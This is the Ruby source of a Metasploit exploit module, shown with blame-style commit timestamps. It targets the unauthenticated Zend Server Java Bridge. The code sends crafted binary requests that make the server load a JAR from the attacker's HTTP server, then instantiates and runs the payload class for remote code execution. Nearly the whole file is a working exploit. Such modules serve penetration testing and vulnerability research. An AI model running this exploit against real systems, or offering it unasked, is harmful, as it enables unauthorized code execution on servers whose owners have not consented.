2011-04-04 23:39:27 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
Rank = GreatRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpServer
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Zend Server Java Bridge Arbitrary Java Code Execution',
|
|
|
|
'Description' => %q{
|
|
|
|
This module takes advantage of a trust relationship issue within the
|
|
|
|
Zend Server Java Bridge. The Java Bridge is responsible for handling interactions
|
2011-10-17 02:58:53 +00:00
|
|
|
between PHP and Java code within Zend Server.
|
2011-11-28 04:42:59 +00:00
|
|
|
|
2011-04-04 23:39:27 +00:00
|
|
|
When Java code is encountered Zend Server communicates with the Java Bridge. The
|
|
|
|
Java Bridge then handles the java code and creates the objects within the Java Virtual
|
|
|
|
Machine. This interaction however, does not require any sort of authentication. This
|
|
|
|
leaves the JVM wide open to remote attackers. Sending specially crafted data to the
|
|
|
|
Java Bridge results in the execution of arbitrary java code.
|
|
|
|
},
|
|
|
|
'Author' => [ 'bannedit' ],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Version' => '$Revision$',
|
|
|
|
'References' =>
|
|
|
|
[
|
2011-04-05 01:08:07 +00:00
|
|
|
[ 'OSVDB', '71420'],
|
|
|
|
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-113/'],
|
2011-04-04 23:39:27 +00:00
|
|
|
[ 'URL', 'http://www.exploit-db.com/exploits/17078/' ],
|
|
|
|
],
|
|
|
|
'Platform' => ['java'], # win
|
|
|
|
'Arch' => ARCH_JAVA,
|
|
|
|
'Privileged' => true,
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Linux', {}],
|
|
|
|
[ 'Windows', {}],
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Mar 28 2011',
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options( [ Opt::RPORT(10001) ], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
start_service()
|
|
|
|
send_java_require
|
|
|
|
end
|
2011-11-28 04:42:59 +00:00
|
|
|
|
2011-04-04 23:39:27 +00:00
|
|
|
def send_java_require()
|
|
|
|
connect
|
|
|
|
|
|
|
|
jar = rand_text_alpha(rand(8)+1) + '.jar'
|
2011-04-05 00:13:01 +00:00
|
|
|
path = get_uri + '/' + jar
|
2011-04-04 23:39:27 +00:00
|
|
|
uri_len = path.length
|
|
|
|
java_require = [0xffffffff, 0x16000000].pack('V*') +
|
|
|
|
"setAdditionalClassPath" + [0x01000000, 0x00000004].pack('V*') +
|
|
|
|
[uri_len].pack('C') + path
|
|
|
|
|
|
|
|
java_require = [java_require.length].pack('N') + java_require
|
2011-10-17 02:58:53 +00:00
|
|
|
|
2011-04-04 23:39:27 +00:00
|
|
|
print_status("Sending java_require() request... #{path}")
|
|
|
|
sock.put(java_require)
|
|
|
|
res = sock.get_once
|
2011-11-28 04:42:59 +00:00
|
|
|
|
2011-04-04 23:39:27 +00:00
|
|
|
select(nil, nil, nil, 5) # wait for the request to be handled
|
|
|
|
create_and_exec
|
|
|
|
end
|
2011-11-28 04:42:59 +00:00
|
|
|
|
2011-04-04 23:39:27 +00:00
|
|
|
def create_and_exec
|
|
|
|
print_status("Sending Final Java Bridge Requests")
|
|
|
|
|
2011-10-17 02:58:53 +00:00
|
|
|
create_obj =
|
2011-04-04 23:39:27 +00:00
|
|
|
[0x34000000, 0x00000000, 0x0c000000].pack('V*') +
|
|
|
|
"CreateObject" +
|
|
|
|
[0x02000000, 0x00000004].pack('V*') + [0x12].pack('C') +
|
|
|
|
"metasploit.Payload" +
|
|
|
|
[0x07000000].pack('N') + [0x00].pack('C')
|
|
|
|
|
|
|
|
sock.put(create_obj)
|
|
|
|
res = sock.get_once
|
|
|
|
obj_id = res[5,4]
|
|
|
|
|
2011-10-17 02:58:53 +00:00
|
|
|
callmain =
|
2011-04-04 23:39:27 +00:00
|
|
|
[0x1f000000].pack('V') + obj_id + [0x04000000].pack('V') + "main" +
|
2011-10-17 02:58:53 +00:00
|
|
|
[0x01000000, 0x00000008, 0x00000201, 0x00040000].pack('V*') + [0x00].pack('C') +
|
2011-04-04 23:39:27 +00:00
|
|
|
[0x00].pack('C') + [0x00].pack('C')
|
|
|
|
|
|
|
|
sock.put(callmain)
|
|
|
|
sock.get_once
|
|
|
|
handler()
|
|
|
|
end
|
|
|
|
|
|
|
|
def on_request_uri(cli, request)
|
|
|
|
if request.uri =~ /\.jar$/i
|
|
|
|
send_response(cli, payload.encoded,
|
|
|
|
{
|
|
|
|
'Content-Type' => 'application/java-archive',
|
|
|
|
'Connection' => 'close',
|
|
|
|
'Pragma' => 'no-cache'
|
|
|
|
})
|
|
|
|
|
|
|
|
print_status("Replied to Request for Payload JAR")
|
|
|
|
end
|
|
|
|
end
|
2011-04-05 01:08:07 +00:00
|
|
|
end
|